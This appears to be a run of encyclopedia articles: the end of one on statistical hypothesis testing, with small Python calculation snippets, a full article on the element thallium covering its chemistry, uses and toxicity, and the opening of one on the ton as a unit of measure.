property, we choose the smallest, in order to minimize the probability of a Type II error, a false negative. For the above example, we select c = 13 (a code sketch verifying this choice appears after the following subsection). Variations and sub-classes Statistical hypothesis testing is a key technique of both frequentist inference and Bayesian inference, although the two types of inference have notable differences. Statistical hypothesis tests define a procedure that controls (fixes) the probability of incorrectly deciding that a default position (null hypothesis) is incorrect. The procedure is based on how likely it would be for a set of observations to occur if the null hypothesis were true. This probability of making an incorrect decision is not the probability that the null hypothesis is true, nor whether any specific alternative hypothesis is true. This contrasts with other possible techniques of decision theory in which the null and alternative hypotheses are treated on a more equal basis. One naïve Bayesian approach to hypothesis testing is to base decisions on the posterior probability, but this fails when comparing point and continuous hypotheses. Other approaches to decision making, such as Bayesian decision theory, attempt to balance the consequences of incorrect decisions across all possibilities, rather than concentrating on a single null hypothesis. A number of other approaches to reaching a decision based on data are available via decision theory and optimal decisions, some of which have desirable properties. Hypothesis testing, though, is a dominant approach to data analysis in many fields of science. Extensions to the theory of hypothesis testing include the study of the power of tests, i.e. the probability of correctly rejecting the null hypothesis given that it is false. Such considerations can be used for the purpose of sample size determination prior to the collection of data. 
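As a numerical check of the clairvoyant-card calculation above, the following sketch assumes only the binomial model already stated (X ~ Binomial(25, 1/4) under the null hypothesis) and searches for the smallest critical value c meeting the 1% requirement; it is illustrative, not drawn from the cited sources:

from scipy.stats import binom

n, p, alpha = 25, 0.25, 0.01
# Find the smallest c with P(X >= c | p = 1/4) <= alpha.
# binom.sf(c - 1, n, p) equals P(X >= c).
for c in range(n + 1):
    if binom.sf(c - 1, n, p) <= alpha:
        print(c, binom.sf(c - 1, n, p))  # prints 13 and ~0.0034
        break

The same survival function reproduces the figures quoted in the example: binom.sf(9, 25, 0.25) is about 0.07 (the tail probability for c = 10), and binom.sf(24, 25, 0.25) is (1/4)^25, on the order of 10^−15.
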
Neyman–Pearson hypothesis testing An example of Neyman–Pearson hypothesis testing (or null hypothesis statistical significance testing) can be made by a change to the radioactive suitcase example. If the "suitcase" is actually a shielded container for the transportation of radioactive material, then a test might be used to select among three hypotheses: no radioactive source present, one present, two (all) present. The test could be required for safety, with actions required in each case. The Neyman–Pearson lemma of hypothesis testing says that a good criterion for the selection of hypotheses is the ratio of their probabilities (a likelihood ratio). A simple method of solution is to select the hypothesis with the highest probability for the Geiger counts observed. The typical result matches intuition: few counts imply no source, many counts imply two sources and intermediate counts imply one source. Note also that there are usually problems in proving a negative. Null hypotheses should be at least falsifiable. Neyman–Pearson theory can accommodate both prior probabilities and the costs of actions resulting from decisions. The former allows each test to consider the results of earlier tests (unlike Fisher's significance tests). The latter allows the consideration of economic issues (for example) as well as probabilities. A likelihood ratio remains a good criterion for selecting among hypotheses. The two forms of hypothesis testing are based on different problem formulations. The original test is analogous to a true/false question; the Neyman–Pearson test is more like multiple choice. In the view of Tukey the former produces a conclusion on the basis of only strong evidence while the latter produces a decision on the basis of available evidence. While the two tests seem quite different both mathematically and philosophically, later developments led to the opposite claim. Consider many tiny radioactive sources. The hypotheses become 0, 1, 2, 3, ... grains of radioactive sand. There is little distinction between none or some radiation (Fisher) and 0 grains of radioactive sand versus all of the alternatives (Neyman–Pearson). The major Neyman–Pearson paper of 1933 also considered composite hypotheses (ones whose distribution includes an unknown parameter). An example proved the optimality of the (Student's) t-test: "there can be no better test for the hypothesis under consideration" (p 321). Neyman–Pearson theory was proving the optimality of Fisherian methods from its inception. Fisher's significance testing has proven a popular, flexible statistical tool in application, but with little mathematical growth potential. Neyman–Pearson hypothesis testing is claimed as a pillar of mathematical statistics, creating a new paradigm for the field. It also stimulated new applications in statistical process control, detection theory, decision theory and game theory. Both formulations have been successful, but the successes have been of a different character. The dispute over formulations is unresolved. Science primarily uses Fisher's (slightly modified) formulation as taught in introductory statistics. Statisticians study Neyman–Pearson theory in graduate school. Mathematicians are proud of uniting the formulations. Philosophers consider them separately. Learned opinions deem the formulations variously competitive (Fisher vs Neyman), incompatible or complementary. The dispute has become more complex since Bayesian inference has achieved respectability. The terminology is inconsistent. 
Hypothesis testing can mean any mixture of two formulations that both changed with time. Any discussion of significance testing vs hypothesis testing is doubly vulnerable to confusion. Fisher thought that hypothesis testing was a useful strategy for performing industrial quality control; however, he strongly disagreed that hypothesis testing could be useful for scientists. Hypothesis testing provides a means of finding test statistics used in significance testing. The concept of power is useful in explaining the consequences of adjusting the significance level and is heavily used in sample size determination. The two methods remain philosophically distinct. They usually (but not always) produce the same mathematical answer. The preferred answer is context dependent. While the existing merger of Fisher and Neyman–Pearson theories has been heavily criticized, modifying the merger to achieve Bayesian goals has been considered. Criticism Criticism of statistical hypothesis testing fills volumes. Much of the criticism can be summarized by the following issues: The interpretation of a p-value is dependent upon the stopping rule and the definition of multiple comparisons. The former often changes during the course of a study and the latter is unavoidably ambiguous (i.e. "p values depend on both the (data) observed and on the other possible (data) that might have been observed but weren't"). Confusion resulting (in part) from combining the methods of Fisher and Neyman–Pearson, which are conceptually distinct. Emphasis on statistical significance to the exclusion of estimation and confirmation by repeated experiments. Rigidly requiring statistical significance as a criterion for publication, resulting in publication bias. Most of the criticism is indirect. Rather than being wrong, statistical hypothesis testing is misunderstood, overused and misused. When used to detect whether a difference exists between groups, a paradox arises. As improvements are made to experimental design (e.g. increased precision of measurement and sample size), the test becomes more lenient. Unless one accepts the absurd assumption that all sources of noise in the data cancel out completely, the chance of finding statistical significance in either direction approaches 100%. However, this absurd assumption that the mean difference between two groups cannot be zero implies that the data cannot be independent and identically distributed (i.i.d.), because the expected difference between any two subgroups of i.i.d. random variates is zero; therefore, the i.i.d. assumption is also absurd. Layers of philosophical concerns. The probability of statistical significance is a function of decisions made by experimenters/analysts. If the decisions are based on convention they are termed arbitrary or mindless, while those not so based may be termed subjective. To minimize Type II errors, large samples are recommended. In psychology practically all null hypotheses are claimed to be false for sufficiently large samples, so "...it is usually nonsensical to perform an experiment with the sole aim of rejecting the null hypothesis." "Statistically significant findings are often misleading" in psychology. Statistical significance does not imply practical significance, and correlation does not imply causation. Casting doubt on the null hypothesis is thus far from directly supporting the research hypothesis. "[I]t does not tell us what we want to know". Lists of dozens of complaints are available. 
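The interplay between sample size and detectable effect that underlies several of these criticisms can be illustrated with the textbook normal-approximation sample-size formula for a two-sided, two-sample comparison of means. This is a sketch under that stated approximation, not a method drawn from the sources cited here:

from scipy.stats import norm

def n_per_group(effect_size, alpha=0.05, power=0.80):
    # Approximate sample size per group for a two-sided, two-sample
    # z-test of means; effect_size is Cohen's d (difference in means
    # divided by the common standard deviation).
    z_alpha = norm.ppf(1 - alpha / 2)
    z_beta = norm.ppf(power)
    return 2 * ((z_alpha + z_beta) / effect_size) ** 2

print(round(n_per_group(0.5)))    # medium effect: ~63 per group
print(round(n_per_group(0.05)))   # tiny effect: ~6280 per group

Because the required n grows as 1/d^2, a large enough sample makes even a trivially small difference statistically significant, which is exactly the paradox the critics describe.
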
Critics and supporters are largely in factual agreement regarding the characteristics of null hypothesis significance testing (NHST): While it can provide critical information, it is inadequate as the sole tool for statistical analysis. Successfully rejecting the null hypothesis may offer no support for the research hypothesis; however, adequate research design can minimize this issue. The continuing controversy concerns the selection of the best statistical practices for the near-term future given the existing practices. Critics would prefer to ban NHST completely, forcing a complete departure from those practices, while supporters suggest a less absolute change. Controversy over significance testing, and its effects on publication bias in particular, has produced several results. The American Psychological Association has strengthened its statistical reporting requirements after review, medical journal publishers have recognized the obligation to publish some results that are not statistically significant to combat publication bias, and a journal (Journal of Articles in Support of the Null Hypothesis) has been created to publish such results exclusively. Textbooks have added some cautions, and increased coverage of the tools necessary to estimate the size of the sample required to produce significant results. Few major organizations have abandoned use of significance tests, although some have discussed doing so. For instance, in 2023, the editors of the Journal of Physiology "strongly recommend the use of estimation methods for those publishing in The Journal" (meaning the magnitude of the effect size, to allow readers to judge whether a finding has practical, physiological, or clinical relevance, and confidence intervals to convey the precision of that estimate), saying "Ultimately, it is the physiological importance of the data that those publishing in The Journal of Physiology should be most concerned with, rather than the statistical significance." Alternatives A unifying position of critics is that statistics should not lead to an accept-reject conclusion or decision, but to an estimated value with an interval estimate; this data-analysis philosophy is broadly referred to as estimation statistics. Estimation statistics can be accomplished with either frequentist or Bayesian methods. Critics of significance testing have advocated basing inference less on p-values and more on confidence intervals for effect sizes (for importance), prediction intervals (for confidence), replications and extensions (for replicability), and meta-analyses (for generality). But none of these suggested alternatives inherently produces a decision. Lehmann said that hypothesis testing theory can be presented in terms of conclusions/decisions, probabilities, or confidence intervals: "The distinction between the ... approaches is largely one of reporting and interpretation." Bayesian inference is one proposed alternative to significance testing. (Nickerson cited 10 sources suggesting it, including Rozeboom (1960)). For example, Bayesian parameter estimation can provide rich information about the data from which researchers can draw inferences, while using uncertain priors that exert only minimal influence on the results when enough data is available. Psychologist John K. Kruschke has suggested Bayesian estimation as an alternative for the t-test and has also contrasted Bayesian estimation for assessing null values with Bayesian model comparison for hypothesis testing. 
Two competing models/hypotheses can be compared using Bayes factors. Bayesian methods could be criticized for requiring information that is seldom available in the cases where significance testing is most heavily used. Neither the prior probabilities nor the probability distribution of the test statistic under the alternative hypothesis are often available in the social sciences. Advocates of a Bayesian approach sometimes claim that the goal of a researcher is most often to objectively assess the probability that a hypothesis is true based on the data they have collected. Neither Fisher's significance testing nor Neyman–Pearson hypothesis testing can provide this information, and neither claims to. The probability a hypothesis is true can only be derived from use of Bayes' theorem, which was unsatisfactory to both the Fisher and Neyman–Pearson camps due to the explicit use of subjectivity in the form of the prior probability. Fisher's strategy is to sidestep this with the p-value (an objective index based on the data alone) followed by inductive inference, while Neyman–Pearson devised their approach of inductive behaviour.
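As a minimal sketch of the Bayes-factor comparison mentioned above (illustrative only; it assumes a point null p = 1/2 against a uniform prior on p, a standard textbook pairing for which the marginal likelihood under the alternative has the closed form 1/(n + 1)):

from math import comb

def bayes_factor_01(k, n):
    # BF01 for k successes in n Bernoulli trials:
    # H0: p = 1/2 versus H1: p ~ Uniform(0, 1).
    # Under H1 the marginal probability of observing k integrates
    # to 1/(n + 1), the same for every k.
    like_h0 = comb(n, k) * 0.5 ** n
    like_h1 = 1 / (n + 1)
    return like_h0 / like_h1

# 60 heads in 100 tosses: the evidence is nearly equivocal between
# the two models, even though a frequentist test is borderline.
print(bayes_factor_01(60, 100))  # ~1.09
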
Mathematics
Statistics and probability
null
30309
https://en.wikipedia.org/wiki/Thallium
Thallium
Thallium is a chemical element; it has symbol Tl and atomic number 81. It is a silvery-white post-transition metal that is not found free in nature. When isolated, thallium resembles tin, but discolors when exposed to air. Chemists William Crookes and Claude-Auguste Lamy discovered thallium independently in 1861, in residues of sulfuric acid production. Both used the newly developed method of flame spectroscopy, in which thallium produces a notable green spectral line. Thallium, from Greek thallos, meaning "green shoot" or "twig", was named by Crookes. It was isolated by both Lamy and Crookes in 1862; Lamy by electrolysis and Crookes by precipitation and melting of the resultant powder. Crookes exhibited it as a powder precipitated by zinc at the International Exhibition, which opened on 1 May that year. Thallium tends to form the +3 and +1 oxidation states. The +3 state resembles that of the other elements in group 13 (boron, aluminium, gallium, indium). However, the +1 state, which is far more prominent in thallium than in the elements above it, recalls the chemistry of alkali metals: thallium(I) ions are found geologically mostly in potassium-based ores and (when ingested) are handled in many ways like potassium ions (K+) by ion pumps in living cells. Commercially, thallium is produced not from potassium ores, but as a byproduct from refining of heavy-metal sulfide ores. Approximately 65% of thallium production is used in the electronics industry and the remainder is used in the pharmaceutical industry and in glass manufacturing. It is also used in infrared detectors. The radioisotope thallium-201 (as the soluble chloride TlCl) is used in small amounts as an agent in a nuclear medicine scan, during one type of nuclear cardiac stress test. Soluble thallium salts (many of which are nearly tasteless) are highly toxic, and they were historically used in rat poisons and insecticides. Because of their nonselective toxicity, use of these compounds has been restricted or banned in many countries. Thallium poisoning usually results in hair loss. Because of its historic popularity as a murder weapon, thallium has gained notoriety as "the poisoner's poison" and "inheritance powder" (alongside arsenic). Characteristics A thallium atom has 81 electrons, arranged in the electron configuration [Xe]4f^14 5d^10 6s^2 6p^1; of these, the three outermost electrons in the sixth shell are valence electrons. Due to the inert pair effect, the 6s electron pair is relativistically stabilised, and it is more difficult to get these electrons involved in chemical bonding than it is for the lighter elements of the group. Thus, very few electrons are available for metallic bonding, similar to the neighboring elements mercury and lead. Thallium, then, like its congeners, is a soft, highly electrically conducting metal with a low melting point of 304 °C. A number of standard electrode potentials, depending on the reaction under study, are reported for thallium, reflecting the greatly decreased stability of the +3 oxidation state. Thallium is the first element in group 13 where the reduction of the +3 oxidation state to the +1 oxidation state is spontaneous under standard conditions. Since bond energies decrease down the group, with thallium the energy released in forming two additional bonds and attaining the +3 state is not always enough to outweigh the energy needed to involve the 6s-electrons. 
Accordingly, thallium(I) oxide and hydroxide are more basic and thallium(III) oxide and hydroxide are more acidic, showing that thallium conforms to the general rule of elements being more electropositive in their lower oxidation states. Thallium is malleable and sectile enough to be cut with a knife at room temperature. It has a metallic luster that, when exposed to air, quickly tarnishes to a bluish-gray tinge, resembling lead. It may be preserved by immersion in oil. A heavy layer of oxide builds up on thallium if left in air. In the presence of water, thallium hydroxide is formed. Sulfuric and nitric acids dissolve thallium rapidly to make the sulfate and nitrate salts, while hydrochloric acid forms an insoluble thallium(I) chloride layer. Isotopes Thallium has 41 isotopes, with atomic masses ranging from 176 to 216. 203Tl and 205Tl are the only stable isotopes and make up nearly all of natural thallium. The five short-lived isotopes 206Tl through 210Tl inclusive occur in nature, as they are part of the natural decay chains of heavier elements. 204Tl is the most stable radioisotope, with a half-life of 3.78 years. It is made by the neutron activation of stable thallium in a nuclear reactor. The most useful radioisotope, 201Tl (half-life 73 hours), decays by electron capture, emitting X-rays (~70–80 keV) and photons of 135 and 167 keV in 10% total abundance; therefore, it has good imaging characteristics without an excessive patient radiation dose. It is the most popular isotope used for thallium nuclear cardiac stress tests. Compounds Thallium(III) Thallium(III) compounds resemble the corresponding aluminium(III) compounds. They are moderately strong oxidizing agents and are usually unstable, as illustrated by the positive reduction potential for the Tl3+/Tl couple. Some mixed-valence compounds are also known, such as Tl4O3 and TlCl2, which contain both thallium(I) and thallium(III). Thallium(III) oxide, Tl2O3, is a black solid which decomposes above 800 °C, forming the thallium(I) oxide and oxygen. The simplest possible thallium compound, thallane (TlH3), is too unstable to exist in bulk, due both to the instability of the +3 oxidation state and to poor overlap of the valence 6s and 6p orbitals of thallium with the 1s orbital of hydrogen. The trihalides are more stable, although they are chemically distinct from those of the lighter group 13 elements and are still the least stable in the whole group. For instance, thallium(III) fluoride, TlF3, has the β-BiF3 structure rather than that of the lighter group 13 trifluorides, and does not form the complex anion TlF63− in aqueous solution. The trichloride and tribromide disproportionate just above room temperature to give the monohalides, and thallium triiodide contains the linear triiodide anion (I3−) and is actually a thallium(I) compound. Thallium(III) sesquichalcogenides do not exist. Thallium(I) The thallium(I) halides are stable. In keeping with the large size of the Tl+ cation, the chloride and bromide have the caesium chloride structure, while the fluoride and iodide have distorted sodium chloride structures. Like the analogous silver compounds, TlCl, TlBr, and TlI are photosensitive and display poor solubility in water. The stability of thallium(I) compounds demonstrates its differences from the rest of the group: a stable oxide, hydroxide, and carbonate are known, as are many chalcogenides. The double salt Tl4(OH)2CO3 has been shown to have hydroxyl-centred triangles of thallium, [Tl3(OH)]2+, as a recurring motif throughout its solid structure. 
The metalorganic compound thallium ethoxide (TlOEt, TlOC2H5) is a heavy liquid (m.p. −3 °C), often used as a basic and soluble thallium source in organic and organometallic chemistry.

Organothallium compounds

Organothallium compounds tend to be thermally unstable, in concordance with the trend of decreasing thermal stability down group 13. The chemical reactivity of the Tl–C bond is also the lowest in the group, especially for ionic compounds of the type R2TlX. Thallium forms the stable [Tl(CH3)2]+ ion in aqueous solution; like the isoelectronic Hg(CH3)2 and [Pb(CH3)2]2+, it is linear. Trimethylthallium and triethylthallium are, like the corresponding gallium and indium compounds, flammable liquids with low melting points. Like indium, thallium cyclopentadienyl compounds contain thallium(I), in contrast to gallium(III).

History

Thallium (from the Greek θαλλός, thallós, meaning "a green shoot or twig") was discovered by William Crookes and Claude Auguste Lamy, working independently, both using flame spectroscopy (Crookes was first to publish his findings, on March 30, 1861). The name refers to thallium's bright green spectral emission line. After the publication of the improved method of flame spectroscopy by Robert Bunsen and Gustav Kirchhoff and the discovery of caesium and rubidium in the years 1859 to 1860, flame spectroscopy became an approved method to determine the composition of minerals and chemical products, and Crookes and Lamy both started to use the new method.

Crookes used it to make spectroscopic determinations for tellurium on selenium compounds deposited in the lead chamber of a sulfuric acid production plant near Tilkerode in the Harz mountains. He had obtained the samples for his research on selenium cyanide from August Hofmann years earlier. By 1862, Crookes was able to isolate small quantities of the new element and determine the properties of a few compounds. Claude-Auguste Lamy used a spectrometer similar to Crookes' to determine the composition of a selenium-containing substance which was deposited during the production of sulfuric acid from pyrite. He also noticed the new green line in the spectra and concluded that a new element was present. Lamy had received this material from the sulfuric acid plant of his friend Frédéric Kuhlmann, and this by-product was available in large quantities; Lamy started to isolate the new element from that source. Because Lamy was able to work with ample quantities of thallium, he was able to determine the properties of several compounds, and in addition he prepared a small ingot of metallic thallium by remelting thallium he had obtained by electrolysis of thallium salts.

As both scientists discovered thallium independently, and a large part of the work, especially the isolation of the metallic thallium, was done by Lamy, Crookes tried to secure his own priority on the work. Lamy was awarded a medal at the 1862 International Exhibition in London "for the discovery of a new and abundant source of thallium", and, after heavy protest, Crookes also received a medal: "thallium, for the discovery of the new element". The controversy between the two scientists continued through 1862 and 1863. Most of the discussion ended after Crookes was elected a Fellow of the Royal Society in June 1863.

The dominant use of thallium was as a poison for rodents. After several accidents, this use was banned in the United States by Presidential Executive Order 11643 in February 1972.
In subsequent years, several other countries also banned its use.

Occurrence and production

The thallium concentration in the Earth's crust is estimated to be 0.7 mg/kg, mostly in association with potassium-based minerals in clays, soils, and granites. The major source of thallium for practical purposes is the trace amount found in copper, lead, zinc, and other heavy-metal-sulfide ores. Thallium is found in the minerals crookesite TlCu7Se4, hutchinsonite TlPbAs5S9, and lorándite TlAsS2. It also occurs as a trace element in iron pyrite, and is extracted as a by-product of roasting this mineral for the production of sulfuric acid. Thallium can also be obtained from the smelting of lead and zinc ores. Manganese nodules found on the ocean floor contain some thallium. In addition, several other thallium minerals, containing 16% to 60% thallium, occur in nature as complexes of sulfides or selenides that primarily contain antimony, arsenic, copper, lead, and silver. These minerals are rare, and have had no commercial importance as sources of thallium. The Allchar deposit in southern North Macedonia was the only area where thallium was actively mined. This deposit still contains an estimated 500 tonnes of thallium, and it is a source for several rare thallium minerals, for example lorándite.

The United States Geological Survey (USGS) estimates that the annual worldwide production of thallium is 10 metric tonnes as a by-product from the smelting of copper, zinc, and lead ores. Thallium is extracted either from the dusts from the smelter flues or from residues such as slag that are collected at the end of the smelting process. The raw materials used for thallium production contain large amounts of other materials, and therefore purification is the first step. The thallium is leached from the material by the use of either an alkali or sulfuric acid. It is precipitated several times from the solution to remove impurities. At the end, it is converted to thallium sulfate, and the thallium is extracted by electrolysis on platinum or stainless-steel plates. The production of thallium decreased by about 33% in the period from 1995 to 2009 – from about 15 metric tonnes to about 10 tonnes. Since there are several small deposits or ores with relatively high thallium content, it would be possible to increase production if a new application, such as a thallium-containing high-temperature superconductor, becomes practical for widespread use outside of the laboratory.

Applications

Historic uses

The odorless and tasteless thallium sulfate was once widely used as a rat poison and ant killer. Since 1972, this use has been prohibited in the United States due to safety concerns, and many other countries followed this example. Thallium salts were used in the treatment of ringworm and other skin infections, and to reduce the night sweating of tuberculosis patients. This use has been limited due to their narrow therapeutic index and the development of improved medicines for these conditions.

Optics

Thallium(I) bromide and thallium(I) iodide crystals have been used as infrared optical materials, because they are harder than other common infrared optics and because they transmit at significantly longer wavelengths. The trade name KRS-5 refers to this material. Thallium(I) oxide has been used to manufacture glasses that have a high index of refraction.
Combined with sulfur or selenium and arsenic, thallium has been used in the production of high-density glasses that have low melting points, in the range of 125 to 150 °C. These glasses have room-temperature properties that are similar to those of ordinary glasses; they are durable, insoluble in water, and have unique refractive indices.

Electronics

Thallium(I) sulfide's electrical conductivity changes with exposure to infrared light, making this compound useful in photoresistors. Thallium selenide has been used in bolometers for infrared detection. Doping selenium semiconductors with thallium improves their performance, so it is used in trace amounts in selenium rectifiers. Another application of thallium doping is in the sodium iodide and caesium iodide crystals of gamma radiation detection devices. In these, the sodium iodide crystals are doped with a small amount of thallium to improve their efficiency as scintillation generators. Some of the electrodes in dissolved oxygen analyzers contain thallium.

High-temperature superconductivity

Research activity with thallium is ongoing to develop high-temperature superconducting materials for such applications as magnetic resonance imaging, storage of magnetic energy, magnetic propulsion, and electric power generation and transmission. The research in applications started after the discovery of the first thallium barium calcium copper oxide superconductor in 1988. Thallium cuprate superconductors have been discovered that have transition temperatures above 120 K. Some mercury-doped thallium-cuprate superconductors have transition temperatures above 130 K at ambient pressure, nearly as high as those of the world-record-holding mercury cuprates.

Nuclear medicine

Before the widespread application of technetium-99m in nuclear medicine, the radioactive isotope thallium-201, with a half-life of 73 hours, was the main substance for nuclear cardiography. The nuclide is still used for stress tests for risk stratification in patients with coronary artery disease (CAD). This isotope of thallium can be generated using a transportable generator, which is similar to the technetium-99m generator. The generator contains lead-201 (half-life 9.33 hours), which decays by electron capture to thallium-201. The lead-201 can be produced in a cyclotron by the bombardment of thallium with protons or deuterons by the (p,3n) and (d,4n) reactions.

Thallium stress test

A thallium stress test is a form of scintigraphy in which the amount of thallium in tissues correlates with tissue blood supply. Viable cardiac cells have normal Na+/K+ ion-exchange pumps. The Tl+ cation binds the K+ pumps and is transported into the cells. Exercise or dipyridamole induces widening (vasodilation) of arteries in the body. This produces coronary steal by areas where arteries are maximally dilated. Areas of infarct or ischemic tissue will remain "cold". Pre- and post-stress thallium imaging may indicate areas that will benefit from myocardial revascularization. Redistribution indicates the existence of coronary steal and the presence of ischemic coronary artery disease.

Other uses

A mercury–thallium alloy, which forms a eutectic at 8.5% thallium, is reported to freeze at −60 °C, some 20 °C below the freezing point of mercury. This alloy is used in thermometers and low-temperature switches. In organic synthesis, thallium(III) salts, such as thallium trinitrate or triacetate, are useful reagents for performing different transformations in aromatics, ketones, and olefins, among others.
Thallium is a constituent of the alloy in the anode plates of magnesium seawater batteries. Soluble thallium salts are added to gold plating baths to increase the speed of plating and to reduce grain size within the gold layer.

A saturated solution of equal parts of thallium(I) formate (Tl(HCO2)) and thallium(I) malonate (Tl(C3H3O4)) in water is known as Clerici solution. It is a mobile, odorless liquid which changes from yellowish to colorless upon reducing the concentration of the thallium salts. With a density of 4.25 g/cm3 at 20 °C, Clerici solution is one of the heaviest aqueous solutions known. It was used in the 20th century for measuring the density of minerals by the flotation method, but its use has been discontinued due to the high toxicity and corrosiveness of the solution.

Thallium iodide is frequently used as an additive in metal-halide lamps, often together with one or two halides of other metals. It allows optimization of the lamp temperature and color rendering, and shifts the spectral output to the green region, which is useful for underwater lighting.

Toxicity

Thallium and its compounds are extremely toxic, with numerous recorded cases of fatal thallium poisoning. The Occupational Safety and Health Administration (OSHA) has set the legal limit (permissible exposure limit) for thallium exposure in the workplace at 0.1 mg/m3 (skin) averaged over an eight-hour workday. The National Institute for Occupational Safety and Health (NIOSH) has also set a recommended exposure limit (REL) of 0.1 mg/m3 (skin) over an eight-hour workday. At levels of 15 mg/m3, thallium is immediately dangerous to life and health. Contact with skin is dangerous, and adequate ventilation is necessary when melting this metal. Thallium(I) compounds have a high aqueous solubility and are readily absorbed through the skin, and care should be taken to avoid this route of exposure, as cutaneous absorption can exceed the absorbed dose received by inhalation at the permissible exposure limit (PEL). Exposure by inhalation cannot safely exceed 0.1 mg/m3 as an eight-hour time-weighted average (40-hour work week). The Centers for Disease Control and Prevention (CDC) states, "Thallium is not classifiable as a carcinogen, and it is not suspected to be a carcinogen. It is unknown whether chronic or repeated exposure to thallium increases the risk of reproductive toxicity or developmental toxicity. Chronic high level exposure to thallium through inhalation has been reported to cause nervous system effects, such as numbness of fingers and toes."

For a long time, thallium compounds were readily available as rat poison. This availability, together with thallium's water solubility and near-tastelessness, led to frequent intoxications, whether by accident or criminal intent.

One of the main methods of removing thallium (both radioactive and stable) from humans is to use Prussian blue, a material which absorbs thallium. Up to 20 grams per day of Prussian blue is fed by mouth to the patient, and it passes through their digestive system and comes out in their stool. Hemodialysis and hemoperfusion are also used to remove thallium from the blood serum. At later stages of the treatment, additional potassium is used to mobilize thallium from the tissues.

According to the United States Environmental Protection Agency (EPA), man-made sources of thallium pollution include gaseous emissions from cement factories, coal-burning power plants, and metal smelters.
The main source of elevated thallium concentrations in water is the leaching of thallium from ore processing operations.
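The time-weighted-average bookkeeping behind the occupational limits quoted above is simple enough to sketch. The following Python fragment is a minimal illustration, not a regulatory tool; the shift measurements in it are invented for the example.

```python
# Minimal sketch of the eight-hour time-weighted average (TWA) used for
# the 0.1 mg/m3 thallium exposure limits above. The shift measurements
# below are hypothetical, chosen only to exercise the arithmetic.

PEL_MG_M3 = 0.1  # permissible exposure limit, eight-hour TWA (skin)

def eight_hour_twa(samples):
    """samples: (duration_hours, concentration_mg_m3) pairs covering 8 h."""
    return sum(hours * conc for hours, conc in samples) / 8.0

shift = [(2.0, 0.05), (4.0, 0.12), (2.0, 0.02)]  # hypothetical readings
twa = eight_hour_twa(shift)
print(f"TWA = {twa:.3f} mg/m3; within PEL: {twa <= PEL_MG_M3}")
```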
Physical sciences
Chemical elements_2
null
30318
https://en.wikipedia.org/wiki/Ton
Ton
Ton is any of several units of measure of mass, volume or force. It has a long history and has acquired several meanings and uses.

As a unit of mass, ton can mean: the long ton, which is 2,240 pounds (about 1,016 kg); the tonne, also called the metric ton, which is 1,000 kilograms (about 2,204.6 lb) or 1 megagram; and the short ton, which is 2,000 pounds (about 907.2 kg). Its original use as a unit of volume has continued in the capacity of cargo ships and in units such as the freight ton and a number of other units, ranging from 35 to 100 cubic feet in size. Recent specialized uses include the ton as a means of truck classification. It can also be used as a unit of energy, or in refrigeration as a unit of power, sometimes called a ton of refrigeration.

Because the ton (of any system of measuring weight) is usually the heaviest unit named in colloquial speech, its name also has figurative uses, singular and plural, informally meaning a large amount or quantity, or to a great degree, as in "There's a ton of bees in this hive," "We have tons of homework," and "I love you a ton."

History

The ton is derived from the tun, the term applied to a cask of the largest capacity. This could contain a volume between 175 and 213 imperial gallons (about 800–970 L), which could weigh around 2,000 pounds (910 kg) and occupy some 60 cubic feet (1.7 m3) of space.

Units of mass/weight

There are several similar units of mass or volume called the ton. The difference between the short ton and the other common forms ("long" and "metric") is about 10%, while the metric and long tons differ by less than 2%. The metric tonne is usually distinguished by its spelling when written, but in the United States and United Kingdom it is pronounced the same as ton, hence it is often spoken as "metric ton" when it is necessary to make the distinction. In the United Kingdom and Australia, the final "e" of "tonne" can also be given a distinct pronunciation. In Ireland and most members of the Commonwealth of Nations, a ton is defined as 2,240 pounds (the long ton). In the United States and Canada, a ton is defined as 2,000 pounds (the short ton).

Other units of mass/weight

Deadweight ton (abbreviation 'DWT' or 'dwt') is a measure of a ship's carrying capacity, including bunker oil, fresh water, ballast water, crew, and provisions. It is expressed in tonnes or long tons. This measurement is also used in the U.S. tonnage of naval ships. Increasingly, tonnes are being used rather than long tons in measuring the displacement of ships.

Harbour ton, used in South Africa in the 20th century, was equivalent to 2,000 pounds, or 1 short ton.

Assay ton (abbreviation 'AT') is not a unit of measurement but a standard quantity used in assaying ores of precious metals. A short assay ton is approximately 29.17 grams and a long assay ton is approximately 32.67 grams. These amounts bear the same ratio to a milligram as a short or long ton bears to a troy ounce. Therefore, the number of milligrams of a particular metal found in a sample weighing one assay ton gives the number of troy ounces of metal contained in a ton of ore.

In documents that predate 1960, the word ton is sometimes spelled tonne, but in more recent documents tonne refers exclusively to the metric ton. In nuclear power plants, tHM and MTHM mean tonnes of heavy metals, and MTU means tonnes of uranium. In the steel industry, the abbreviation THM means 'tons/tonnes hot metal', which refers to the amount of liquid iron or steel that is produced, particularly in the context of blast furnace production or specific consumption.

Subdivisions

Both the UK definition of the long ton and the US definition of the short ton have similar underlying bases. Each is equivalent to 20 hundredweight; however, these are long or short hundredweight (112 and 100 pounds, respectively).
Before the 20th century, there were several definitions. Prior to the 15th century in England, the ton was 20 hundredweight, each of 108 lb, giving a ton of 2,160 pounds. In the 19th century, in different parts of Britain, definitions of 2,240, 2,352, or 2,400 lb were used, with 2,000 lb for explosives; the legal ton was usually 2,240 lb. In the United Kingdom, Canada, Australia, and other areas that had used the imperial system, the tonne is the form of ton legal in trade.

Units of volume

The displacement, essentially the weight, of a ship is traditionally expressed in long tons. To simplify measurement, it is determined by measuring the volume, rather than weight, of water displaced, and calculating the weight from the volume and density. For practical purposes the displacement ton (DT) is a unit of volume, 35 cubic feet (0.99 m3), the approximate volume occupied by one ton of seawater (the actual volume varies with salinity and temperature). It is slightly less than the 224 imperial gallons (1.018 m3) of the water ton (based on distilled water).

One measurement ton or freight ton is equal to 40 cubic feet (1.13 m3), but historically it has had several different definitions. It is used to determine the amount of money to be charged in loading, unloading, or carrying different sorts of cargo. In general, if a cargo is heavier than salt water, the actual weight is used. If it is lighter than salt water, e.g. feathers, freight is calculated in measurement tons of 40 cubic feet.

Gross tonnage and net tonnage are volumetric measures of the cargo-carrying capacity of a ship. The Panama Canal/Universal Measurement System (PC/UMS) is based on net tonnage, modified for Panama Canal billing purposes. PC/UMS is based on a mathematical formula to calculate a vessel's total volume; a PC/UMS net ton is equivalent to 100 cubic feet of capacity.

The water ton is used chiefly in Great Britain, in statistics dealing with petroleum products, and is defined as 224 imperial gallons (1.018 m3), the volume occupied by 2,240 lb (1,016 kg) of water under the conditions that define the imperial gallon.

Units of energy and power

Ton of TNT

